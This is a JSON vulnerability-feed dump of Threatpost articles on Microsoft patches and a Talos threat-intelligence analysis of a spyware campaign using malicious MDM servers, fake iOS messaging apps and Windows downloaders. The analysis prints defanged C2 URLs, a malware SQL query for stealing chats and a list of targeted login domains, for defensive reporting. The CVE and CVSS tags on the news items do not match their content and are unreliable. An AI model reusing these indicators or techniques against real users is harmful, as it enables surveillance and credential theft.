"bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/>)Microsoft on Tuesday patched the vulnerability in Windows that was exploited by the [BEAST SSL attack](<https://threatpost.com/new-attack-breaks-confidentiality-model-ssl-allows-theft-encrypted-cookies-091911/>) tool developed by Juliano Rizzo and Thai Duong last year. 
The patch is one of several rated important that was issued by Microsoft in [January\u2019s Patch Tuesday](<https://technet.microsoft.com/en-us/security/bulletin/ms12-jan>) release, and there also was a critical bulletin released, fixing two separate vulnerabilities in Windows Media Player.\n\nThe vulnerability that is fixed by the patch in [MS12-](<https://technet.microsoft.com/en-us/security/bulletin/ms12-006>)006 actually lies in the SSL 3.0/TLS 1.0 protocol. The attack that Rizzo and Duong developed and released in September enables them to decrypt users\u2019 SSL sessions on the fly and hijack them, including sessions with online banking sites and other sensitive sites. The bug has been known for a long time, but it wasn\u2019t until last year that a practical exploitation of it surfaced.\n\n\u201cThis vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected,\u201d Microsoft said in its bulletin. \u201cThe security update addresses the vulnerability by modifying the way that the Windows Secure Channel (SChannel) component sends and receives encrypted network packets.\u201d\n\nThe highest priority bulletin for the January release is [MS12-004](<https://blogs.technet.com/b/srd/archive/2012/01/10/more-information-on-ms12-004.aspx?Redirected=true>), which includes fixes for two vulnerabilities in Windows Media Player. One of the bugs in that bulletin is the only critical one fixed in January, and it\u2019s a remote code execution flaw. It affects Windows XP, Vista, Server 2003 and Server 2008.\n\nThere\u2019s also a vulnerability in the Windows kernel that has the effect of allowing attackers to bypass one of the exploit-mitigation technologies in Windows, SafeSEH. 
After bypassing that, an attacker could then use other bugs to compromise an affected machine.\n\n\u201cThis issue can result in SafeSEH not being enforced for a binary that has been built with support for SafeSEH. This occurs when a binary that was built with Microsoft Visual C++ .NET 2003 RTM is loaded by an application running on a version of Windows that is affected by MS12-001,\u201d Microsoft said in the bulletin.\n\n\u201cThe reason that SafeSEH is not enforced in this scenario is because Microsoft Visual C++ .NET 2003 RTM produces binaries with metadata that is a different size than what the Windows loader expects. As a result, the loader conservatively falls back to assuming that the binary does not support SafeSEH. MS12-001 addresses this issue by allowing binaries to have metadata of the size that is produced by Microsoft Visual C++ .NET 2003 RTM.\u201d\n", "modified": "2013-04-17T16:33:01", "published": "2012-01-10T19:31:32", "id": "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "href": "https://threatpost.com/microsoft-fixes-beast-ssl-bug-january-patch-tuesday-011012/76083/", "type": "threatpost", "title": "Microsoft Fixes BEAST SSL Bug in January Patch Tuesday", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:29", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft\u2019s lawsuit against the U.S. government for the right to tell its customers when a federal agency is looking at their emails is getting widespread support by privacy advocates. For many, Microsoft\u2019s stance lends an important and powerful voice to ongoing efforts to reform the Electronic Communications Privacy Act that is at the heart of Microsoft\u2019s beef with the government. 
\n\n\u201cWe applaud Microsoft for challenging government gag orders that prevent companies from being more transparent with their customers about government searches of their data,\u201d said Andrew Crocker, staff attorney with the Electronic Frontier Foundation. \n\nFor Crocker and Microsoft, the stance is tied to bigger issues such as free speech and First Amendment rights. \u201cIn nearly all cases, indefinite gag orders and gag orders issued routinely rather than in exceptional cases are unconstitutional prior restraints on free speech and infringe on First Amendment rights,\u201d he said. \n\nThe software giant\u2019s chief legal officer Brad Smith said Microsoft said it has been required to maintain secrecy about more than 2,500 legal demands over the past 18 months. More than 1,752 (68 percent) of those secrecy orders had no end date. Smith noted that, \u201cThis means we effectively are prohibited forever from telling our customers that the government has obtained their data.\u201d \n\nMicrosoft\u2019s lawsuit challenges gag order provision in the Electronic Communications Privacy Act (ECPA) that allows courts to force companies that offer cloud storage to say nothing when asked to turn over customer data. Reforms of ECPA have been long fought by privacy advocates such as the Electronic Privacy Information Center. \n\nAlan Butler, senior counsel at Electronic Privacy Information Center said that such secret orders by the government should be the exception, but increasingly the requests have become the rule. \u201cNotice is one of the key protections provided under the Fourth Amendment, and law enforcement efforts to delay or otherwise restrict notice should be viewed skeptically by the courts,\u201d he said. \n\nFor the ACLU, it used Microsoft\u2019s lawsuit as an opportunity for Congress to implement reforms on the Electronic Communications Privacy Act. 
\u201cIf Congress fails to include those changes as it considers ECPA reform, then the courts should step in, including in Microsoft\u2019s case, to end the government\u2019s constitutional failure to provide notice,\u201d said Alex Abdo, staff attorney with the ACLU in a statement.\n\nMicrosoft\u2019s lawsuit is the latest in a string of high-profile battles with the government over privacy issues. Last week, tech firms and privacy advocates banded together to [voice opposition to a draft bill](<https://threatpost.com/burr-feinstein-anti-crypto-bill-slammed-by-critics/117314/>), Compliance with Court Orders Act of 2016. Then, of course, there is Apple and its battle with the government\u2019s demands to help it crack its own encryption in order to break into an iPhone.\n\nControversial aspects of ECPA have been debated for years. In fact, earlier this week the House Judiciary Committee amended a current ECPA reform bill \u2014 the Email Privacy Act \u2014 by removing a provision that also attempts to fix notice requirement. The timing of Microsoft\u2019s suit is fortuitous, Butler said. \n\n\u201cI think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. 
\n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate, from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed & Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), puts the figure at 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "modified": "2016-04-15T19:22:02", "published": "2016-04-15T15:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft will use its monthly patch to fix a critical security hole in versions of its Microsoft Office suite that could allow attackers to run malicious code on vulnerable systems. \n\nThe company [announced details of its upcoming monthly patch for November on Thursday](<http://www.microsoft.com/technet/security/bulletin/ms10-nov.mspx>). 
This month\u2019s patch also included bulletins regarding upcoming fixes for two other security vulnerabilities: another in the Microsoft Office suite that was rated \u201cimportant,\u201d and a third in the Forefront Unified Access Gateway that was also rated \u201cimportant.\u201d \n\nThe relatively meager group of three bulletins is a welcome change for IT administrators still trying to dig out from [October\u2019s monthly patch](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>), which comprised 16 bulletins and fixes for 49 separate vulnerabilities. \n\nThe most serious vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and affects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. 
\n", "modified": "2013-04-17T16:35:44", "published": "2010-11-04T21:58:02", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:25", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft has pulled a recent patch for Outlook 2007 after it caused slow performance and problems with third party e-mail services. Microsoft withdrew a software update [released last week](<https://threatpost.com/microsoft-closes-door-stuxnet-december-patch-121410/>) after reports that the update, to its Outlook 2007 e-mail product, was causing problems for customers connecting to third party e-mail products. \n\nThe company has withdrawn the update [KB2412171](<http://support.microsoft.com/kb/2412171>) from its Microsoft Update service, [according to a blog post](<http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx>). Microsoft recommends that customers who have installed it and encountered problems uninstall the patch.\n\nUsers began reporting problems with the Outlook 2007 update soon after it was released on December 14. Among other things, customers reported severe slowdowns in the Outlook 2007 application when moving between mail folders or clicking on Calendar or Task links. \n\nCustomers who used Outlook to send and receive messages from e-mail servers that were not running Microsoft\u2019s Exchange e-mail server software, including Gmail and Windows Live Hotmail, were affected. 
In addition, the update prevented Gmail users from connecting to Gmail\u2019s mail servers if the Outlook Secure Password Authentication (SPA) option was enabled, and broke Auto Archiving for IMAP, POP3 and Outlook Live Connector accounts that were managed using Outlook, if no Exchange Server account was configured in the same Outlook profile, Microsoft said. \n\nMicrosoft apologized for the disruption and has provided instructions for removing the update while the company investigates the performance issues. \n", "modified": "2013-04-17T16:35:28", "published": "2010-12-21T17:21:16", "id": "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "href": "https://threatpost.com/microsoft-withdraws-outlook-update-after-gmail-conflicts-122110/74796/", "type": "threatpost", "title": "Microsoft Withdraws Outlook Update After Gmail Conflicts", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:30", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>)Microsoft has released a workaround for the [Windows kernel zero-day vulnerability exploited by the Duqu](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) malware, and said that it is working on a permanent patch, but didn\u2019t specify a timeline for its release. The vulnerability is a serious one that can lead to remote code execution on vulnerable machines.\n\nIn an advisory issued Thursday night, Microsoft security officials said that the flaw is in the TrueType font parsing engine in Windows. This is the first time that the exact location and nature of the flaw has been made public. Microsoft said that the permanent fix for the new vulnerability will not be ready in time for next week\u2019s November patch Tuesday release. 
The [FixIt tool](<http://support.microsoft.com/kb/2639658>) that Microsoft released Thursday automatically applies the workaround that the company suggests in its security [advisory on the Windows kernel flaw](<https://technet.microsoft.com/en-us/security/advisory/2639658>).\n\nTo apply the workaround manually, users of 32-bit systems can enter the following at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\nFor 64-bit systems, users should enter this at the command prompt:\n\n`Echo y| cacls \"%windir%\\system32\\t2embed.dll\" /E /P everyone:N`\n\n`Echo y| cacls \"%windir%\\syswow64\\t2embed.dll\" /E /P everyone:N`\n\nMicrosoft said in its advisory that although the overall effect of the vulnerability is low thus far, it has been used in some targeted attacks by the [Duqu malware](<https://threatpost.com/using-stuxnet-and-duqu-words-mass-disruption-102011/>).\n\n\u201cMicrosoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time,\u201d the advisory says.\n\nThe company said it is monitoring the ongoing attacks and is aware that the kind and prevalence of the attacks could change quickly, so it is recommending that users install the workaround now and then the patch when it is available.\n\n\u201cFinally, given our ability to detect exploit attempts for this issue, we are able to closely monitor the threat landscape and will notify customers if we see any indication of increased risk. As previously stated, the risk for customers remains low. 
However, that is subject to change so we encourage customers to either apply the workaround or ensure their anti-malware vendor has added new signatures based on the information we\u2019ve provided them to ensure protections are in place for this issue,\u201d [Microsoft\u2019s Jerry Bryant](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) said in a blog post.\n", "modified": "2013-04-17T16:33:25", "published": "2011-11-04T11:47:32", "id": "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "href": "https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/75850/", "type": "threatpost", "title": "Microsoft Releases Workaround For Kernel Flaw Used By Duqu", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. 
Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting, and enabling DEP (Data Execution Prevention) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "modified": "2018-08-15T14:04:18", "published": "2009-11-24T14:39:50", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. 
Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "modified": "2013-04-17T16:39:09", "published": "2009-06-09T20:26:38", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2018-07-25T12:50:08", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0802"], "description": "_This blog post is authored by[ ](<https://twitter.com/securitybeard?lang%3Den>)[Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and[ ](<https://twitter.com/r00tbsd>)[Paul Rascagneres](<https://twitter.com/r00tbsd>) and[ ](<https://twitter.com/SmugYeti>)[Andrew Williams](<https://twitter.com/SmugYeti>)._ \n \n\n\n## Summary\n\n \nSince our [initial post](<https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html>) on malicious mobile device management (MDM) platforms, we have gathered more information about this actor that we believe shows it is part of a broader campaign targeting multiple platforms. These new targets include Windows devices and additional backdoored iOS applications. We also believe we have associated this actor with a very similar campaign affecting Android devices. \n \nWith this additional information, we have been able to build a profile of how the MDM was working, as explained in the previous post, while also allowing us to identify new infrastructure. We feel that it is critical that users are aware of this attack method, as well-funded actors will continue to utilize MDMs to carry out their campaigns. To be infected by this kind of malware, a user needs to enroll their device, which means they should be on the lookout at all times to avoid accidental enrollment. 
\n \nIn the new MDM we discovered, the actor changed some of their infrastructure in an attempt to improve the MDM's security posture. We also found additional compromised devices, which were again located in India, with one even using the same phone number linking the MDM platforms, and one located in Qatar. We believe this newer version was used from January to March 2018. Similar to the previous MDM, we were able to identify the IPA files the attacker was using to compromise iOS devices. Additionally, we discovered that malicious apps such as WhatsApp had new malicious methods tacked onto them. \n \nDuring this ongoing analysis, we also looked into other potential indicators that would point us toward the actor. We discovered this [Bellingcat article](<https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/>) that potentially links this actor to one they dubbed \"Bahamut,\" an advanced actor who was previously targeting Android devices. Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post. There was also a separate post from [Amnesty International](<https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852>) discussing a similar actor that used similar spear-phishing techniques to Bahamut. However, Cisco Talos did not find any spear phishing associated with this campaign. We will discuss some links and potential overlapping with these campaigns below. \n \n \n \n\n\n## New MDM\n\n \n\n\n### Technical information about the MDM\n\n \nTalos identified a third MDM server that we believe was used by this actor: ios-update-whatsapp[.]com. 
\n \nThe first relevant difference between this MDM and the MDM we discussed in the previous article is the fact that the attackers patched the open-source project[ ](<https://github.com/project-imas/mdm-server>)[mdm-server](<https://github.com/project-imas/mdm-server>) \u2014 a small iOS MDM server. The attackers added an authentication process. In the last version, no authentication was available. Here is the auth page: \n\n\n[](<https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s1600/image1.png>)\n\n \nAdditionally, we identified different technical information based on the certificate used. Here is the certificate used by this MDM: \n \nCA.crt \n\n \n \n Serial Number: 17948952500637370160 (0xf9177d33a2d98730) \n Signature Algorithm: sha256WithRSAEncryption \n Issuer: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n Validity \n Not Before: Jan 15 09:47:15 2018 GMT \n Not After : Jan 15 09:47:15 2019 GMT \n Subject: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n \n\nA fake company, Tech Big, which was allegedly located in Hong Kong, had this certificate issued to it in January 2018. \n\n\n### Log analysis\n\n \nThree devices were enrolled on this server: \n \n\n\n * Two devices with an Indian phone number that were also located in India (one of the devices has the same phone number as the believed attacker's device used in the previous post)\n * One device with a British phone number located in Qatar\n \nThe logs showed us that the MDM was created in January 2018, and was used from January to March of this year. \n \n\n\n## New malicious iOS apps\n\n \n\n\n### Fake Telegram & WhatsApp\n\n \nTalos identified two other malicious Telegram and WhatsApp apps. The attacker built these apps by adding malicious capabilities to existing Telegram and WhatsApp applications. 
The malicious aspect of the apps is the same as what we described in the previous post. The only difference is the command and control (C2) obfuscation. The URLs are not stored in plaintext, but are encrypted with data encryption standard (DES) and encoded in base64. \n \nHere is an example of the encoded URL: \n\n\n[](<https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s1600/image3.png>)\n\n \nAnd the DES key: \n\n\n[](<https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s1600/image4.png>)\n\n \nOnce decoded and decrypted, we can easily read the URL of the C2: \n\n \n \n ./decode.py vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ== '&%^*#@!$' \n hxxp://hytechmart[.]com/UcSmCMbYECELdbe/ \n \n\n### Fake IMO\n\n \nIMO is a chat and video app available on mobile devices. We identified a fake application that pretended to be IMO. The attackers used the same technique, BOptions sideloading, to add malicious code to the legitimate application. For more information about this technique, we recommend reading the previous blog post. \n \nThe C2 server has the same obfuscation technique as the fake, malicious Telegram and WhatsApp apps described above. The attacker simply changed the encryption key used. The purpose of the malicious code is similar to the previous malicious apps in that it steals contact information and chat history. This application uses SQLite to store the data. Here is an example of a request performed to get the data: \n \n\n\n * DBManager accesses 'IMODb2.sqlite'\n * Select ZIMOCHATMSG.Z_PK,ZIMOCHATMSG.ZTEXT,ZIMOCHATMSG.ZISSENT,ZIMOCONTACT.ZPHONE,ZIMOCONTACT.ZBUID AS Contact_ID from ZIMOCONTACT join ZIMOCHATMSG ON (ZIMOCONTACT.ZBUID = ZIMOCHATMSG.ZBUID) where ZIMOCHATMSG.Z_PK >'%d'\n\n### Malicious Safari browser\n\n \nTalos has also discovered a malicious Safari application available on the third malicious MDM. 
For this application, the attackers did not use the BOptions sideloading technique. It's a malicious browser developed from scratch and based on three open-source projects: [SCSafariPageController](<https://github.com/stefanceriu/SCSafariPageController>), [SCPageViewController ](<https://github.com/stefanceriu/SCPageViewController>)and [SCScrollView](<https://github.com/stefanceriu/SCScrollView>). \n \nThe purpose of this browser is to steal sensitive information from the infected device. First, the app sends the universally unique identifier (UUID) of the device to the C2 server. Based on the server response, the malicious browser will send additional information, such as the user's contact information (picture, name, email, postal address, etc.), the user's pictures, the browser's cookies and the clipboard. \n \nThe malware checks for a file named \"hib.txt,\" and if the file doesn't exist on the device, it displays an iTunes login page in an attempt to harvest the user's login credentials. Upon entering the credentials, the email address and password are sent to the C2 server. Additionally, these credentials get written into the file and the user is considered \"signed in.\" \n \nThe most intriguing part is the credential stealer. If the browsed domain name contains one of the following strings, the malware will automatically exfiltrate the username and the password of the user to the C2 server. Most notably, there is the presence of secure email providers, among a variety of other web services. 
\n \n\n\n * Login.yahoo (email platform)\n * Mail.com (email platform)\n * Rediff (Indian news portal and email platform with around 95 million registered users)\n * Amazon (e-commerce platform)\n * Pinterest (image-sharing and discovery platform)\n * Reddit (news aggregation web portal with forums)\n * Accounts.google (Google sign-in platform)\n * Ask.fm (anonymous decentralised Q&A platform)\n * Mail.qq (Chinese email platform)\n * Baidu.com (Chinese search engine and email provider)\n * Mail.protonmail (secure email provider located in Switzerland)\n * Gmx (email platform)\n * AonLine.aon (British assurance)\n * ZoHo (Indian email service)\n * Tutanota (secure email provider located in Germany)\n * Lycos.com (search engine and web portal with email platform)\n \nThe malware continuously monitors a web page, seeking out the HTML form fields that hold the username and password as the user types them in to steal credentials. The names of the inspected HTML fields are embedded into the app alongside the domain names. Here is a list of the \"username\" fields that are referenced by the app code: \n\n\n[](<https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s1600/image5.png>)\n\nFor example, we see m_U, which is the username field in the Lycos mail authentication page: \n\n\n[](<https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s1600/image7.png>)\n\n \nThe malware contains a similar list concerning the password field. \n \nFinally, the malicious browser contains three malicious plugins: \n\n\n * \"Add Bookmark\"\n * \"Add To Favourites\"\n * \"Add to Reading List\"\nThe purpose of the malicious extensions are very similar to the previous ones \u2014 it sends off stored data to the same C2 server as the other apps. \n \nIn the core and the plugins, the C2 server is encoded in base64 and encrypted in AES instead of DES. 
\n \n\n\n## Links with previous campaign\n\n \nThe Bahamut group was discovered and detailed by Bellingcat, an open-source news website. In this post, the author was discussing Android-based malware with some similarities to the iOS malware we identified. That post kickstarted our investigation into any potential overlap between these campaigns and how they are potentially linked. \n \nThe new MDM platform we identified has similar victimology with Middle Eastern targets, namely Qatar, using a U.K. mobile number issued from LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign. \n \nWe identified an overlap in the domain voguextra[.]com, which was used by Bahamut within their \"Devoted To Humanity\" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post. Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal [here](<https://www.virustotal.com/%23/url/a65bcd077ea0c098ae0bc88414a38f2cf4333cae40d704eb88dfa043819f70d7/details>) using hxxp://voguextra[.]com/decoy.doc. \n \nThe domains used during this campaign shared similarities with the domains used throughout the Bahamut campaign reported by Bellingcat. Most of the email addresses used within the domains were [*@mail.ru](<mailto:*@mail.ru>) email accounts, the C2s identified both used AES encrypted strings represented as base64 values, and the URI patterns used in both campaigns shared an almost identical syntax: \n\n \n \n repository + random.php + GET value \n /hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string] \n \n\nThe domains also had similar structures for the domain name (they are formatted [word]-[word]-[word]) across both campaigns. Actors tend to stick with similar structures, especially if they have had success in the past. \n \nOnce we started profiling the domains, we quickly noticed a strong link to India. 
With access to historical whois and hosting information, we were able to determine that the three MDM domains pointed to an Indian nexus. All three domains used a privacy proxy to register their domains. However, what the actor did not do was create nameservers upon registering the domains. This allowed us to discover that two of the three domains were registered with Indian registrars and hosting providers. \n \nThe three domains identified for MDM use were ios-update-whatsapp[.]com, ios-certificate-update[.]com and www[.]wpitcher[.]com. \n \n**ios-update-whatsapp[.]com** \n \nThe nameserver used initially was obox.dns[.]com, which is owned by Directi, an India-based registrar and platform. This later changed to [ns1-2].ios-update-whatsapp[.]com, which suggests this domain was potentially registered and purchased in India. \n \n**wpitcher[.]com** \n \nThis domain initially used nameservers related to the Indian company MantraGrid, an India-based cloud platform. Since wpitcher[.]com was one of the original MDM domains we identified, this is another link to an Indian actor. \n \n**ios-certificate-update.com** \n \nThis domain used a similar structure to ios-update-whatsapp[.]com and also shared the same privacy proxy as the other two domains listed above relating to the MDM activity. This was one of the first registered domains and was using a bulletproof hosting platform in Panama. \n \nFinally, Bellingcat, via Tom Lancaster, identified similarities with a previous InPage campaign reported by [Kaspersky](<https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/>) which shows similar URI structuring, as well as victimology. The InPage attack targeted Urdu-speaking Muslims, which further increases the likelihood that the victims are Indian-based because Urdu is a dialect primarily spoken in India and Pakistan. 
With our attacker, we identified that the MDM was also taking advantage of an application called PrayTime \u2014 a popular app for Muslims that alerts them to complete their daily prayers. \n \nWith all of this taken into consideration, we assess with moderate confidence that the attacker is located in India. Additionally, we assess with low confidence that the campaign we discovered is linked to the Bahamut group. \n \n\n\n## Links with Windows-targeted campaigns\n\n \nTalos identified several malicious binaries that could be used to target victims running Microsoft Windows operating systems using the same infrastructure as the malicious app mentioned in our previous article, techwach.com. \n \nThe sample 6b62f4db64edf7edd648c38a563f44b656b0f6ad9a0e4e97f93cf9abfdfc63e5 contacts the following URL to download an additional payload: \n \n\n\n * hxxp://techwach[.]com/Beastwithtwobacks/Barkingupthewrongtree.php\n \nWe know that the MDM and the Windows services were up and running on the same C2 server in May 2018. The purpose of this malicious Windows binary is to get information on the infected device (username and hostname), send this information and retrieve an additional PE32 file if the operator estimates that the targeted system is relevant. \n \nWe found additional similar samples between June 2017 and June 2018 with different C2 servers. The attackers have two kinds of samples: one developed in Delphi and one developed in VisualBasic. 
